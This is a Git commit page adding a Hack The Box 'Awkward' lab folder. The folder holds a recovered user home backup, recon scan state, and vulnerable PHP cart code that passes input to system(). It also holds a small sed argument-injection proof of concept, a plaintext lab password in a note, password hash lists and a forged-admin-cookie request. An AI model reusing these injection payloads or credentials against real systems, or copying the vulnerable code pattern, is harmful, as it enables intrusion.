simon/CTF
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

init htb

Browse Source 
old htb folders
This commit is contained in:
Simon
2023-08-29 21:53:22 +02:00
parent 62ab804867
commit 82b0759f1e
21891 changed files with 6277643 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

0
HTB/awkward/1.txt Normal file
View File

10
HTB/awkward/ape.php Normal file
View File

@@ -0,0 +1,10 @@
<?php
$STORE_HOME = "./";
$item_id="1.txt";
$user_id="admin -n '1e exec id'";
echo("sed -i '{$item_id}' {$STORE_HOME}cart/{$user_id}\n");
system("sed -i '{$item_id}' {$STORE_HOME}cart/{$user_id}");
?>

BIN
HTB/awkward/backup.tar Normal file
View File

Binary file not shown.

BIN
HTB/awkward/backup/bean_backup.tar.gz Normal file
View File

Binary file not shown.

1
HTB/awkward/backup/bean_backup/.bash_history Symbolic link
View File

@@ -0,0 +1 @@
/dev/null

7
HTB/awkward/backup/bean_backup/.bash_logout Normal file
View File

@@ -0,0 +1,7 @@
# ~/.bash_logout: executed by bash(1) when login shell exits.
# when leaving the console clear the screen to increase privacy
if [ "$SHLVL" = 1 ]; then
[ -x /usr/bin/clear_console ] && /usr/bin/clear_console -q
fi

120
HTB/awkward/backup/bean_backup/.bashrc Normal file
View File

@@ -0,0 +1,120 @@
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
*i*) ;;
*) return;;
esac
# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color|*-256color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
# custom
alias backup_home='/bin/bash /home/bean/Documents/backup_home.sh'
# Add an "alert" alias for long running commands. Use like so:
# sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi

0
HTB/awkward/backup/bean_backup/.config/.gsd-keyboard.settings-ported Normal file
View File

94
HTB/awkward/backup/bean_backup/.config/autostart/xpad.desktop Normal file
View File

@@ -0,0 +1,94 @@
[Desktop Entry]
Version=1.0
Name=Xpad
Name[af]=Xpad
Name[bg]=Xpad
Name[cs]=Xpad
Name[da]=Xpad
Name[de]=Xpad
Name[en_GB]=Xpad
Name[es]=Xpad
Name[et]=Xpad
Name[fi]=Xpad
Name[fr]=Xpad
Name[ga]=Xpad
Name[hr]=Xpad
Name[hu]=Xpad
Name[it]=Xpad
Name[ja]=Xpad
Name[ko]=Xpad
Name[lv]=Xpad
Name[nl]=Xpad
Name[pt]=Xpad
Name[ro]=Xpad
Name[ru]=Xpad
Name[sv]=Xpad
Name[th]=Xpad
Name[tr]=Xpad
Name[vi]=Xpad
Name[zh_CN]=Xpad
Name[zh_TW]=Xpad
GenericName=Sticky Notes
GenericName[af]=Plaknotas (klewerig)
GenericName[bg]=Лепкави бележки
GenericName[cs]=Lepící poznámky
GenericName[da]=Selvklæbende noter
GenericName[de]=Klebezettel
GenericName[en_GB]=Sticky Notes
GenericName[es]=Notas adhesivas
GenericName[et]=Märkmepaberid
GenericName[fi]=Liimalappumuistiinpanot
GenericName[fr]=Notes adhésives
GenericName[ga]=Nótaí Greamaitheacha
GenericName[hr]=Post-it papirići
GenericName[hu]=Ragadós jegyzetek
GenericName[it]=Foglietti adesivi
GenericName[ja]=付箋
GenericName[ko]=Sticky Notes
GenericName[lv]=Līmlapiņas
GenericName[nl]=Memo's
GenericName[pt]=Notas colantes
GenericName[ro]=Note Lipicioase(sticky)
GenericName[ru]=Cтикеры
GenericName[sv]=Klistriga anteckningar
GenericName[vi]=Ghi chép bám dính
GenericName[zh_CN]=自粘性备注
GenericName[zh_TW]=自粘性便條
Comment=Jot down notes for later
Comment[af]=Maak notas vir later
Comment[bg]=Запазване на бележките за по-късно
Comment[cs]=Odsunout níže na později
Comment[da]=Krads noter ned til senere brug
Comment[de]=Notizen für später notieren
Comment[en_GB]=Jot down notes for later
Comment[es]=Anotar para más tarde
Comment[et]=Kiirete märkmete tegemine edaspidiseks
Comment[fi]=Raapusta muistiin myöhempää käyttöä varten
Comment[fr]=Prendre des notes pour plus tard
Comment[ga]=Breac nótaí le léamh ar ball
Comment[hr]=Zapiši bilješku za poslije
Comment[hu]=Jegyzetek felvitele későbbi használatra
Comment[it]=Prendi delle note da ricordare
Comment[ja]=手早くメモを取る
Comment[nl]=Notities maken voor later
Comment[pt]=Anotar para mais tarde
Comment[ro]=Notiţe pentru mai târziu
Comment[ru]=Заметки/стикеры на вашем рабочем столе
Comment[sv]=Plita ner anteckningar för senare användning
Comment[vi]=Ghi nhanh chú thích đến sau
Comment[zh_CN]=简要记录备注以备日后使用
Comment[zh_TW]=大略記下備註以供之後使用
TryExec=xpad
Exec=xpad
Terminal=false
Icon=xpad
StartupNotify=true
StartupWMClass=xpad
Type=Application
Categories=GTK;Utility;
X-LXQt-Need-Tray=true
Keywords=notes;postit

BIN
HTB/awkward/backup/bean_backup/.config/dconf/user Normal file
View File

Binary file not shown.

35
HTB/awkward/backup/bean_backup/.config/evolution/sources/system-proxy.source Normal file
View File

@@ -0,0 +1,35 @@
[Data Source]
DisplayName[de]=Standard-Proxy-Einstellungen
DisplayName[el]=Προεπιλεγμένες ρυθμίσεις διαμεσολαβητή
DisplayName[en_GB]=Default Proxy Settings
DisplayName[fi]=Välityspalvelimen oletusasetukset
DisplayName[fr]=Réglages par défaut du serveur mandataire
DisplayName[it]=Impostazioni proxy predefinite
DisplayName[lv]=Noklusējuma starpnieka iestatījumi
DisplayName[ms]=Tetapan Proksi Lalai
DisplayName[nb]=Forvalgte innstillinger for mellomtjener
DisplayName[nl]=Standaardproxy-instellingen
DisplayName[pl]=Domyślne ustawienia pośrednika
DisplayName[ro]=Configurări implicite proxy
DisplayName[sr]=Подразумевана подешавања посредника
DisplayName[zh_TW]=預設 Proxy 設定
DisplayName=Default Proxy Settings
Enabled=true
Parent=
[Proxy]
Method=default
IgnoreHosts=localhost;127.0.0.0/8;::1;
AutoconfigUrl=
FtpHost=
FtpPort=0
HttpAuthPassword=
HttpAuthUser=
HttpHost=
HttpPort=8080
HttpUseAuth=false
HttpsHost=
HttpsPort=0
SocksHost=
SocksPort=0

1
HTB/awkward/backup/bean_backup/.config/gnome-initial-setup-done Normal file
View File

@@ -0,0 +1 @@
yes

5
HTB/awkward/backup/bean_backup/.config/gtk-3.0/bookmarks Normal file
View File

@@ -0,0 +1,5 @@
file:///home/bean/Documents
file:///home/bean/Music
file:///home/bean/Pictures
file:///home/bean/Videos
file:///home/bean/Downloads

7
HTB/awkward/backup/bean_backup/.config/ibus/bus/ee6a821b27764b4d9e547b4690827539-unix-0 Normal file
View File

@@ -0,0 +1,7 @@
# This file is created by ibus-daemon, please do not modify it.
# This file allows processes on the machine to find the
# ibus session bus with the below address.
# If the IBUS_ADDRESS environment variable is set, it will
# be used rather than this file.
IBUS_ADDRESS=unix:abstract=/home/bean/.cache/ibus/dbus-aFcG5feC,guid=3dec9de0e2cbb2442d14006463230e0b
IBUS_DAEMON_PID=2079

7
HTB/awkward/backup/bean_backup/.config/ibus/bus/ee6a821b27764b4d9e547b4690827539-unix-wayland-0 Normal file
View File

@@ -0,0 +1,7 @@
# This file is created by ibus-daemon, please do not modify it.
# This file allows processes on the machine to find the
# ibus session bus with the below address.
# If the IBUS_ADDRESS environment variable is set, it will
# be used rather than this file.
IBUS_ADDRESS=unix:abstract=/home/bean/.cache/ibus/dbus-aFcG5feC,guid=3dec9de0e2cbb2442d14006463230e0b
IBUS_DAEMON_PID=2079

2
HTB/awkward/backup/bean_backup/.config/pulse/cookie Normal file
View File

@@ -0,0 +1,2 @@
Éö$÷¦˝ţe°Ň„‘‹ş¤şöXĎ6ńˉ*xóě‡&ś4^řB$ď_@ňäRLJ7şÖĚ5ˇ'`X-ślć@Ë«H‰]Ĺ/—1}ňŮŔX·‰bßÓWŤC©m|ƶ.‰Ňű˘@^+_Ŕé¤0¤¦äÖ
«ýž`łŚĘOí˘

BIN
HTB/awkward/backup/bean_backup/.config/pulse/ee6a821b27764b4d9e547b4690827539-card-database.tdb Normal file
View File

Binary file not shown.

1
HTB/awkward/backup/bean_backup/.config/pulse/ee6a821b27764b4d9e547b4690827539-default-sink Normal file
View File

@@ -0,0 +1 @@

1
HTB/awkward/backup/bean_backup/.config/pulse/ee6a821b27764b4d9e547b4690827539-default-source Normal file
View File

@@ -0,0 +1 @@

BIN
HTB/awkward/backup/bean_backup/.config/pulse/ee6a821b27764b4d9e547b4690827539-device-volumes.tdb Normal file
View File

Binary file not shown.

BIN
HTB/awkward/backup/bean_backup/.config/pulse/ee6a821b27764b4d9e547b4690827539-stream-volumes.tdb Normal file
View File

Binary file not shown.

15
HTB/awkward/backup/bean_backup/.config/user-dirs.dirs Normal file
View File

@@ -0,0 +1,15 @@
# This file is written by xdg-user-dirs-update
# If you want to change or add directories, just edit the line you're
# interested in. All local changes will be retained on the next run.
# Format is XDG_xxx_DIR="$HOME/yyy", where yyy is a shell-escaped
# homedir-relative path, or XDG_xxx_DIR="/yyy", where /yyy is an
# absolute path. No other format is supported.
#
XDG_DESKTOP_DIR="$HOME/Desktop"
XDG_DOWNLOAD_DIR="$HOME/Downloads"
XDG_TEMPLATES_DIR="$HOME/Templates"
XDG_PUBLICSHARE_DIR="$HOME/Public"
XDG_DOCUMENTS_DIR="$HOME/Documents"
XDG_MUSIC_DIR="$HOME/Music"
XDG_PICTURES_DIR="$HOME/Pictures"
XDG_VIDEOS_DIR="$HOME/Videos"

1
HTB/awkward/backup/bean_backup/.config/user-dirs.locale Normal file
View File

@@ -0,0 +1 @@
en_AU

14
HTB/awkward/backup/bean_backup/.config/xpad/content-DS1ZS1 Normal file
View File

@@ -0,0 +1,14 @@
TO DO:
- Get real hat prices / stock from Christine
- Implement more secure hashing mechanism for HR system
- Setup better confirmation message when adding item to cart
- Add support for item quantity > 1
- Implement checkout system
boldHR SYSTEM/bold
bean.hill
014mrbeanrules!#P
https://www.slac.stanford.edu/slac/www/resource/how-to-use/cgi-rexx/cgi-esc.html
boldMAKE SURE TO USE THIS EVERYWHERE ^^^/bold

23
HTB/awkward/backup/bean_backup/.config/xpad/default-style Normal file
View File

@@ -0,0 +1,23 @@
decorations 0
height 200
width 200
confirm_destroy 1
edit_lock 0
sticky_on_start 0
tray_enabled 1
tray_click_configuration 1
back rgb(255,238,153)
use_back 1
text rgb(0,0,0)
use_text 1
fontname Sans 9
toolbar 1
auto_hide_toolbar 1
scrollbar 1
buttons New, Delete, Separator, Cut, Copy, Paste, Separator, Undo, Redo
autostart_wait_systray 1
autostart_delay 0
autostart_new_pad 0
autostart_display_pads 2
hide_from_taskbar 0
hide_from_task_switcher 0

12
HTB/awkward/backup/bean_backup/.config/xpad/info-GQ1ZS1 Normal file
View File

@@ -0,0 +1,12 @@
width 383
height 450
x 0
y 0
follow_font 1
follow_color 1
sticky 0
hidden 0
back rgb(255,238,153)
text rgb(0,0,0)
fontname Sans 9
content content-DS1ZS1

BIN
HTB/awkward/backup/bean_backup/.gnupg/pubring.kbx Normal file
View File

Binary file not shown.

BIN
HTB/awkward/backup/bean_backup/.gnupg/trustdb.gpg Normal file
View File

Binary file not shown.

BIN
HTB/awkward/backup/bean_backup/.local/share/evolution/addressbook/system/contacts.db Normal file
View File

Binary file not shown.

6
HTB/awkward/backup/bean_backup/.local/share/evolution/tasks/system/tasks.ics Normal file
View File

@@ -0,0 +1,6 @@
BEGIN:VCALENDAR
CALSCALE:GREGORIAN
PRODID:-//Ximian//NONSGML Evolution Calendar//EN
VERSION:2.0
X-EVOLUTION-DATA-REVISION:2022-09-15T11:35:40.604383Z(1)
END:VCALENDAR

0
HTB/awkward/backup/bean_backup/.local/share/gnome-settings-daemon/input-sources-converted Normal file
View File

8
HTB/awkward/backup/bean_backup/.local/share/gnome-shell/application_state Normal file
View File

@@ -0,0 +1,8 @@
<?xml version="1.0"?>
<application-state>
<context id="">
<application id="xpad.desktop" score="10" last-seen="1663242380"/>
<application id="gnome-initial-setup.desktop" score="1" last-seen="1663241771"/>
<application id="org.gnome.Terminal.desktop" score="69" last-seen="1663242380"/>
</context>
</application-state>

0
HTB/awkward/backup/bean_backup/.local/share/gnome-shell/gnome-overrides-migrated Normal file
View File

BIN
HTB/awkward/backup/bean_backup/.local/share/gvfs-metadata/home Normal file
View File

Binary file not shown.

BIN
HTB/awkward/backup/bean_backup/.local/share/gvfs-metadata/home-41546c5f.log Normal file
View File

Binary file not shown.

BIN
HTB/awkward/backup/bean_backup/.local/share/gvfs-metadata/root Normal file
View File

Binary file not shown.

BIN
HTB/awkward/backup/bean_backup/.local/share/gvfs-metadata/root-46f3d4c6.log Normal file
View File

Binary file not shown.

BIN
HTB/awkward/backup/bean_backup/.local/share/keyrings/login.keyring Normal file
View File

Binary file not shown.

BIN
HTB/awkward/backup/bean_backup/.local/share/keyrings/user.keystore Normal file
View File

Binary file not shown.

0
HTB/awkward/backup/bean_backup/.local/share/nautilus/tags/.meta.isrunning Normal file
View File

BIN
HTB/awkward/backup/bean_backup/.local/share/nautilus/tags/meta.db Normal file
View File

Binary file not shown.

BIN
HTB/awkward/backup/bean_backup/.local/share/nautilus/tags/meta.db-shm Normal file
View File

Binary file not shown.

0
HTB/awkward/backup/bean_backup/.local/share/nautilus/tags/meta.db-wal Normal file
View File

BIN
HTB/awkward/backup/bean_backup/.local/share/nautilus/tags/ontologies.gvdb Normal file
View File

Binary file not shown.

0
HTB/awkward/backup/bean_backup/.local/share/nautilus/tracker2-migration-complete Normal file
View File

5
HTB/awkward/backup/bean_backup/.local/share/recently-used.xbel Normal file
View File

@@ -0,0 +1,5 @@
<?xml version="1.0" encoding="UTF-8"?>
<xbel version="1.0"
xmlns:bookmark="http://www.freedesktop.org/standards/desktop-bookmarks"
xmlns:mime="http://www.freedesktop.org/standards/shared-mime-info"
></xbel>

3
HTB/awkward/backup/bean_backup/.local/share/session_migration-ubuntu Normal file
View File

@@ -0,0 +1,3 @@
[State]
timestamp=1663241738
migrated=ubuntu-settings-migrate-to-defaults.18.10.1.py;yaru-theme-gtk-abandon-Yaru-light.sh;dark-theme-migration.sh;unity-gnome-shell-migration.17.10.py;

27
HTB/awkward/backup/bean_backup/.profile Normal file
View File

@@ -0,0 +1,27 @@
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.
# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022
# if running bash
if [ -n "$BASH_VERSION" ]; then
# include .bashrc if it exists
if [ -f "$HOME/.bashrc" ]; then
. "$HOME/.bashrc"
fi
fi
# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
PATH="$HOME/bin:$PATH"
fi
# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/.local/bin" ] ; then
PATH="$HOME/.local/bin:$PATH"
fi

8
HTB/awkward/backup/bean_backup/Documents/backup_home.sh Normal file
View File

@@ -0,0 +1,8 @@
#!/bin/bash
mkdir /home/bean/Documents/backup_tmp
cd /home/bean
tar --exclude='.npm' --exclude='.cache' --exclude='.vscode' -czvf /home/bean/Documents/backup_tmp/bean_backup.tar.gz .
date > /home/bean/Documents/backup_tmp/time.txt
cd /home/bean/Documents/backup_tmp
tar -czvf /home/bean/Documents/backup/bean_backup_final.tar.gz .
rm -r /home/bean/Documents/backup_tmp

0
HTB/awkward/backup/bean_backup/Documents/backup_tmp/bean_backup.tar.gz Normal file
View File

1
HTB/awkward/backup/bean_backup/snap/snapd-desktop-integration/14/.config/dconf/user Symbolic link
View File

@@ -0,0 +1 @@
/home/bean/.config/dconf/user

9
HTB/awkward/backup/bean_backup/snap/snapd-desktop-integration/14/.config/fontconfig/fonts.conf Normal file
View File

@@ -0,0 +1,9 @@
<fontconfig>
<dir>/snap/snapd-desktop-integration/14/gnome-platform/usr/share/fonts</dir>
<dir>/usr/local/share//fonts</dir>
<dir>/usr/share//fonts</dir>
<include ignore_missing="yes">/etc/fonts/conf.d</include>
<include ignore_missing="yes">conf.d</include>
<cachedir prefix="xdg">fontconfig</cachedir>
<cachedir>/var/snap/snapd-desktop-integration/common/fontconfig</cachedir>
</fontconfig>

1
HTB/awkward/backup/bean_backup/snap/snapd-desktop-integration/14/.config/gtk-2.0/gtkfilechooser.ini Symbolic link
View File

@@ -0,0 +1 @@
/home/bean/.config/gtk-2.0/gtkfilechooser.ini

1
HTB/awkward/backup/bean_backup/snap/snapd-desktop-integration/14/.config/gtk-3.0/bookmarks Symbolic link
View File

@@ -0,0 +1 @@
/home/bean/.config/gtk-3.0/bookmarks

1
HTB/awkward/backup/bean_backup/snap/snapd-desktop-integration/14/.config/gtk-3.0/settings.ini Symbolic link
View File

@@ -0,0 +1 @@
/home/bean/.config/gtk-3.0/settings.ini

1
HTB/awkward/backup/bean_backup/snap/snapd-desktop-integration/14/.config/ibus/bus Symbolic link
View File

@@ -0,0 +1 @@
/home/bean/.config/ibus/bus

15
HTB/awkward/backup/bean_backup/snap/snapd-desktop-integration/14/.config/user-dirs.dirs Normal file
View File

@@ -0,0 +1,15 @@
# This file is written by xdg-user-dirs-update
# If you want to change or add directories, just edit the line you're
# interested in. All local changes will be retained on the next run.
# Format is XDG_xxx_DIR="$HOME/yyy", where yyy is a shell-escaped
# homedir-relative path, or XDG_xxx_DIR="/yyy", where /yyy is an
# absolute path. No other format is supported.
#
XDG_DESKTOP_DIR="/home/bean/Desktop"
XDG_DOWNLOAD_DIR="/home/bean/Downloads"
XDG_TEMPLATES_DIR="/home/bean/Templates"
XDG_PUBLICSHARE_DIR="/home/bean/Public"
XDG_DOCUMENTS_DIR="/home/bean/Documents"
XDG_MUSIC_DIR="/home/bean/Music"
XDG_PICTURES_DIR="/home/bean/Pictures"
XDG_VIDEOS_DIR="/home/bean/Videos"

1
HTB/awkward/backup/bean_backup/snap/snapd-desktop-integration/14/.config/user-dirs.dirs.md5sum Normal file
View File

@@ -0,0 +1 @@
e96ec7012d30be266ba6e6d81e88228d -

1
HTB/awkward/backup/bean_backup/snap/snapd-desktop-integration/14/.config/user-dirs.locale Normal file
View File

@@ -0,0 +1 @@
en_AU

1
HTB/awkward/backup/bean_backup/snap/snapd-desktop-integration/14/.config/user-dirs.locale.md5sum Normal file
View File

@@ -0,0 +1 @@
391bd5c3f2a3493e8bddeba3e6c73f31 -

1
HTB/awkward/backup/bean_backup/snap/snapd-desktop-integration/14/.last_revision Normal file
View File

@@ -0,0 +1 @@
SNAP_DESKTOP_LAST_REVISION=14

1
HTB/awkward/backup/bean_backup/snap/snapd-desktop-integration/14/.local/share/themes Symbolic link
View File

@@ -0,0 +1 @@
/snap/snapd-desktop-integration/14/data-dir/themes

1
HTB/awkward/backup/bean_backup/snap/snapd-desktop-integration/14/.themes Symbolic link
View File

@@ -0,0 +1 @@
/snap/snapd-desktop-integration/14/data-dir/themes

1
HTB/awkward/backup/bean_backup/snap/snapd-desktop-integration/current Symbolic link
View File

@@ -0,0 +1 @@
14

1
HTB/awkward/backup/time.txt Normal file
View File

@@ -0,0 +1 @@
Thu 15 Sep 2022 21:46:25 AEST

0
HTB/awkward/cart/admin Normal file
View File

107
HTB/awkward/cart_actions.php Normal file
View File

@@ -0,0 +1,107 @@
<?php
$STORE_HOME = "/var/www/store/";
//check for valid hat valley store item
function checkValidItem($filename) {
if(file_exists($filename)) {
$first_line = file($filename)[0];
if(strpos($first_line, "***Hat Valley") !== FALSE) {
return true;
}
}
return false;
}
//add to cart
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['action'] === 'add_item' && $_POST['item'] && $_POST['user']) {
$item_id = $_POST['item'];
$user_id = $_POST['user'];
$bad_chars = array(";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"); //no hacking allowed!!
foreach($bad_chars as $bad) {
if(strpos($item_id, $bad) !== FALSE) {
echo "Bad character detected!";
exit;
}
}
foreach($bad_chars as $bad) {
if(strpos($user_id, $bad) !== FALSE) {
echo "Bad character detected!";
exit;
}
}
if(checkValidItem("{$STORE_HOME}product-details/{$item_id}.txt")) {
if(!file_exists("{$STORE_HOME}cart/{$user_id}")) {
system("echo '***Hat Valley Cart***' > {$STORE_HOME}cart/{$user_id}");
}
system("head -2 {$STORE_HOME}product-details/{$item_id}.txt | tail -1 >> {$STORE_HOME}cart/{$user_id}");
echo "Item added successfully!";
}
else {
echo "Invalid item";
}
exit;
}
//delete from cart
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['action'] === 'delete_item' && $_POST['item'] && $_POST['user']) {
$item_id = $_POST['item'];
$user_id = $_POST['user'];
$bad_chars = array(";","&","|",">","<","*","?","`","$","(",")","{","}","[","]","!","#"); //no hacking allowed!!
foreach($bad_chars as $bad) {
if(strpos($item_id, $bad) !== FALSE) {
echo "Bad character detected!";
exit;
}
}
foreach($bad_chars as $bad) {
if(strpos($user_id, $bad) !== FALSE) {
echo "Bad character detected!";
exit;
}
}
if(checkValidItem("{$STORE_HOME}cart/{$user_id}")) {
system("sed -i '/item_id={$item_id}/d' {$STORE_HOME}cart/{$user_id}");
echo "Item removed from cart";
}
else {
echo "Invalid item";
}
exit;
}
//fetch from cart
if ($_SERVER['REQUEST_METHOD'] === 'GET' && $_GET['action'] === 'fetch_items' && $_GET['user']) {
$html = "";
$dir = scandir("{$STORE_HOME}cart");
$files = array_slice($dir, 2);
foreach($files as $file) {
$user_id = substr($file, -18);
if($user_id === $_GET['user'] && checkValidItem("{$STORE_HOME}cart/{$user_id}")) {
$product_file = fopen("{$STORE_HOME}cart/{$file}", "r");
$details = array();
while (($line = fgets($product_file)) !== false) {
if(str_replace(array("\r", "\n"), '', $line) !== "***Hat Valley Cart***") { //don't include first line
array_push($details, str_replace(array("\r", "\n"), '', $line));
}
}
foreach($details as $cart_item) {
$cart_items = explode("&", $cart_item);
for($x = 0; $x < count($cart_items); $x++) {
$cart_items[$x] = explode("=", $cart_items[$x]); //key and value as separate values in subarray
}
$html .= "<tr><td>{$cart_items[1][1]}</td><td>{$cart_items[2][1]}</td><td>{$cart_items[3][1]}</td><td><button data-id={$cart_items[0][1]} onclick=\"removeFromCart(this, localStorage.getItem('user'))\" class='remove-item'>Remove</button></td></tr>";
}
}
}
echo $html;
exit;
}
?>

1
HTB/awkward/ferox-http_awkward_htb:80_-1675808288.state Normal file
View File

@@ -0,0 +1 @@
{"scans":[{"id":"d7aaa3dde5404e86a522802fd6c4a9c2","url":"http://awkward.htb:80/","normalized_url":"http://awkward.htb:80/","scan_type":"Directory","status":"Running","num_requests":833000}],"config":{"type":"configuration","wordlist":"/root/.local/share/AutoRecon/wordlists/dirbuster.txt","config":"/etc/feroxbuster/ferox-config.toml","proxy":"","replay_proxy":"","target_url":"http://awkward.htb:80/","status_codes":[200,204,301,302,307,308,401,403,405,500],"replay_codes":[200,204,301,302,307,308,401,403,405,500],"filter_status":[],"threads":10,"timeout":7,"verbosity":1,"silent":false,"quiet":true,"auto_bail":false,"auto_tune":false,"json":false,"output":"/home/kali/htb/awkward/results/awkward.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt","debug_log":"","user_agent":"feroxbuster/2.7.3","random_agent":false,"redirects":false,"insecure":true,"extensions":["txt","html","php","asp","aspx","jsp"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":true,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"collect_words":false,"force_recursion":false},"responses":[{"type":"response","url":"http://awkward.htb/","original_url":"http://awkward.htb:80/","path":"/","wildcard":false,"status":200,"method":"GET","content_length":132,"line_count":8,"word_count":13,"headers":{"content-type":"text/html","etag":"\"63231b83-84\"","accept-ranges":"bytes","content-length":"132","connection":"keep-alive","last-modified":"Thu, 15 Sep 2022 12:33:07 GMT","server":"nginx/1.18.0 (Ubuntu)","date":"Tue, 07 Feb 2023 22:18:04 GMT"},"extension":""}],"statistics":{"type":"statistics","timeouts":0,"requests":1424,"expected_per_scan":833000,"total_expected":833000,"errors":0,"successes":3,"redirects":0,"client_errors":1421,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":0,"extensions_collected":0,"status_200s":3,"status_301s":0,"status_302s":0,"status_401s":0,"status_403s":0,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":0,"responses_filtered":0,"resources_discovered":1,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0]},"collected_extensions":[],"filters":[]}

1
HTB/awkward/ferox-http_hat-valley_htb:80_-1675809555.state Normal file
View File

File diff suppressed because one or more lines are too long

1
HTB/awkward/hash Normal file
View File

@@ -0,0 +1 @@
admin:$apr1$lfvrwhqi$hd49MbBX3WNluMezyjWls1

4
HTB/awkward/hashes.txt Normal file
View File

@@ -0,0 +1,4 @@
christine.wool:6529fc6e43f9061ff4eaa806b087b13747fbe8ae0abfd396a5c4cb97c5941649
christopher.jones:e59ae67897757d1a138a46c1f501ce94321e96aa7ec4445e0e97e94f2ec6c8e1
jackson.lightheart:b091bc790fe647a0d7e8fb8ed9c4c01e15c77920a42ccd0deaca431a44ea0436
bean.hill:37513684de081222aaded9b8391d541ae885ce3b55942b9ac6978ad6f6e1811f

14
HTB/awkward/leave.req Normal file
View File

@@ -0,0 +1,14 @@
POST /api/submit-leave HTTP/1.1
Host: hat-valley.htb
Content-Length: 59
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: application/json
Origin: http://hat-valley.htb
Referer: http://hat-valley.htb/leave
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: token=admin
Connection: close
{"reason":"reason","start":"01/01/1970","end":"01/01/1970"}

0
HTB/awkward/results/awkward.htb/report/local.txt Normal file
View File

8
HTB/awkward/results/awkward.htb/report/notes.txt Normal file
View File

@@ -0,0 +1,8 @@
[*] ssh found on tcp/22.
[*] http found on tcp/80.

0
HTB/awkward/results/awkward.htb/report/proof.txt Normal file
View File

32
